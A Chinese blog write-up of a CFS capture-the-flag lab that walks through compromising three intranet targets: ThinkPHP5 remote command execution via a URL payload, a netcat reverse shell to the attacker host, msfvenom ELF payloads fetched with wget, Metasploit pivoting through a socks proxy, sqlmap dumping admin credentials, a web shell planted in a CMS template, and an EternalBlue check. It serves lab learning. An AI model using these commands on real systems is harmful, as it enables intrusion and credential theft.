HackerGu‘s Blog
CFS靶机搭建—https://www.anquanke.com/post/id/187908#h2-10
靶机搭建
靶机搭建是我最头疼的地方,下面写一下配置的关键点。
在vm虚拟机中,最为重要的就是这里:虚拟网络编辑器
其中最为头疼的呢就是桥接网络的设置。为什么说头疼呢,因为之前桥接网络,我就没有成功过。不过,这次可算真正弄清楚了。使用桥接网络最关键的一点就是一定要使用一个可以上网的正常网卡(如果不自己选择的话,vm会自动选择,很有可能就导致无法上网)。
那如何查看到底使用哪块网卡呢?接下来以图片展示:
由上图可以看出,我本机上网使用的是WLAN,于是在桥接模式中,我们就选择红框内标记的网卡即可。
贴个链接把,解决vm桥接模式无法正常使用
如果桥接模式始终不好使,但是你又真的是按照规定步骤来设置的,那么就重启电脑。重启电脑之后,一般就好了。
另外,还需要配置两个仅主机模式的网卡,那个就很简单了。手动给好IP地址,关闭DHCP即可。
在此建议,为了减少错误的发生,我们可以将vm的网络设置进行还原,以一个初始化的状态进行配置会好很多。还有一点需要注意的就是taget2机器ip的分配,登录靶机之后,首先使用命令ifconfig,查看相关的网卡,然后再对其进行分配IP,例如:ifconfig ens33 192.168.22.22 netmask 255.255.255.0 。
忘了说taget1,有时候分配的IP并不和CFS靶机那篇文章里的一样,但是并不影响我们使用。我们只需要在宝塔面板里对网站的域名重新解析即可。
主机扫描
target1
使用Nmap对其进行扫描
root@kali:~# nmap -sS -A 192.168.101.91 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-12 11:20 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.101.91
Host is up (0.00045s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:7.4:
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
80/tcp open http nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
888/tcp open http nginx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open mysql MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8888/tcp open http Ajenti http control panel
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /robots.txt: Robots file
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:1F:D6:B9 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.101.91
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 564.90 seconds
我们得知目标开放了21、22、80、111、3306等端口。
22端口,爆出了用户名枚举漏洞,我们可以利用其进行爆破。
但是,按照常理,我们先访问一下80端口。
ThinkPHP5这玩意儿是个好东西,有很多漏洞。不急,我们先看下刚才nmap扫出的robots.txt
发现一枚flag:
ThinkPHP5远程命令执行
直接利用:
http://192.168.101.91/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
执行成功。
反弹shell
既然可以执行命令,那么我们就进行反弹shell。
先在kali上执行,nc -lvp 7777
而后,我们利用远程命令执行漏洞,执行nc 192.168.101.90 7777 -e /bin/bash
命令执行之后,我们拿到了shell,并使用python -c 'import pty;pty.spawn("/bin/bash")'获取交互shell。
在网站的根目录下发现了flag
在服务器的/home目录下,又发现了一枚flag。
至此,target1中的flag已经查找完毕。接下来,对target进行渗透。
target2
经过测试目标机器,可以使用wget,那就好说了,利用msf生成elf马。
生成elf
使用命令uname -a查看内核
[www@localhost public]$ uname -a
uname -a
Linux localhost.localdomain 3.10.0-1062.1.1.el7.x86_64 #1 SMP Fri Sep 13 22:55:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
所以,我们生成的木马也要是x86的。
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.101.90 LPORT=8888 -f elf >shell.elf
target1目标机器上线
使用python2开启web服务,python -m SimpleHTTPServer 8080
我们在目标机器上使用wget http://192.168.101.90:8080/shell.elf,下载elf文件。
并执行chmod +x shell.elf,赋予其执行权限。
接下来,在我们的kali中设置监听:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.101.90
lhost => 192.168.101.90
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.101.90 yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
开启监听,并在目标机器上执行elf文件:
成功上线。
路由转发
在msf中使用命令:run get_local_subnets,获取当前的网段。
192.168.101.0是我们刚才利用的网段,现在我们需要访问另一个网段的机器。需要添加路由。
利用命令run autoroute -s 192.168.22.0/24,添加路由。
并使用run autoroute -p,打印路由信息。
发现target2
本来想直接使用后渗透模块中的arp_scanner进行arp发现扫描,但是linux的elf,并不支持此脚本。
那我们就换一种方法。
使用portscan模块:
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,3389
ports => 22,3389
msf5 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 22,3389 yes Ports to scan (e.g. 22-25,80,110-900)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.22.0/24 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 100 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
为了简便,我就扫描了22端口和3389端口。
从扫描的结果中看出,192.168.22.22是一台linux机器,也就是我们正要找的target2。
由于这是一台处于内网中的机器,我们想要对其进行访问,有两种方式:
1、端口转发。(效率不高)
2、使用代理。
为了更好的进行渗透,我采用socks4a代理。
msf5 auxiliary(scanner/portscan/tcp) > search socks4a
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/socks4a normal No Socks4a Proxy Server
msf5 auxiliary(scanner/portscan/tcp) > use 0
msf5 auxiliary(server/socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf5 auxiliary(server/socks4a) > set srvport 9999
srvport => 9999
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
socks4a的代理默认开在本地的端口,这样我们就可以访问到msf里的所有路由。
设置proxychain代理
在kali中编辑,vim /etc/proxychains.conf
这样我们就可以使用代理对其进行扫描了。
proxychains nmap -Pn -sT 192.168.22.22,对目标进行扫描。
解释一下,这里为什么用 ‘-Pn -sT’,因为socks4a不支持icmp协议,所以要使用不进行ping命令的-Pn,’-sT’则代表进行Tcp扫描。
得到扫描结果:
接着,使用此代理访问该IP的80端口,查看web服务。
是八哥cms,习惯性的查看了robots.txt
凭借robots.txt中的信息,找到了后台地址。
突破点是在主页的源码上,提示有注入。
拿出sqlmap:
python sqlmap.py -u http://192.168.22.22/index.php?r=vul&keyword=1 -p keyword --dbs
python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms --tables
python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns
python sqlmap.py -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
登陆后台
拿到密码登录后台,发现flag。
找到模板修改处,添加一句话。
然后设置proxifier
使用菜刀连接http://192.168.22.22/index.php?r=tag ,密码为pass。
拿shell
在网站的/upload下发现flag
上线msf
使用命令uname -a,查看Linux版本
这次我们就要使用bind_tcp了。
bind_tcp:攻击机设置一个端口(LPORT),Payload在测试机执行打开该端口,以便攻击机可以接入。
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=1111 -f elf > shell1.elf
----------------------------------------------------------------------------
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 192.168.22.22
rhost => 192.168.22.22
msf5 exploit(multi/handler) > set lport 1111
lport => 1111
我们在目标机器运行生成的shell1.elf之后即可上线。
上线之后就还是老样子,发现路由,添加路由。
target3
msf5 exploit(multi/handler) > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal Yes WordPress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal Yes NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal Yes TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal Yes FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal Yes TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal Yes TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal Yes TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
msf5 exploit(multi/handler) > use 5
msf5 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 22,3389 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.22.0/24 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 100 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.33.0/24
rhosts => 192.168.33.0/24
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,445,3389
ports => 22,445,3389
msf5 auxiliary(scanner/portscan/tcp) > exploit
[+] 192.168.33.33: - 192.168.33.33:445 - TCP OPEN
[+] 192.168.33.33: - 192.168.33.33:3389 - TCP OPEN
[+] 192.168.33.22: - 192.168.33.22:22 - TCP OPEN
[*] 192.168.33.0/24: - Scanned 49 of 256 hosts (19% complete)
[*] 192.168.33.0/24: - Scanned 59 of 256 hosts (23% complete)
[*] 192.168.33.0/24: - Scanned 99 of 256 hosts (38% complete)
[*] 192.168.33.0/24: - Scanned 114 of 256 hosts (44% complete)
[*] 192.168.33.0/24: - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.33.0/24: - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.33.0/24: - Scanned 201 of 256 hosts (78% complete)
[*] 192.168.33.0/24: - Scanned 208 of 256 hosts (81% complete)
[*] 192.168.33.0/24: - Scanned 255 of 256 hosts (99% complete)
[*] 192.168.33.0/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
发现目标机器192.168.33.33,开放了445和3389端口。
那就永恒之蓝走一波
永恒之蓝
先检测一下是否存在漏洞
msf5 auxiliary(scanner/portscan/tcp) > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 auxiliary(scanner/portscan/tcp) > use 1
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33
rhosts => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.33.33:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.33.33:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
可以看到漏洞存在,那就利用!
最后,网络出了点小问题,就没再去整,看了一下题解,最后是可以利用成功的。
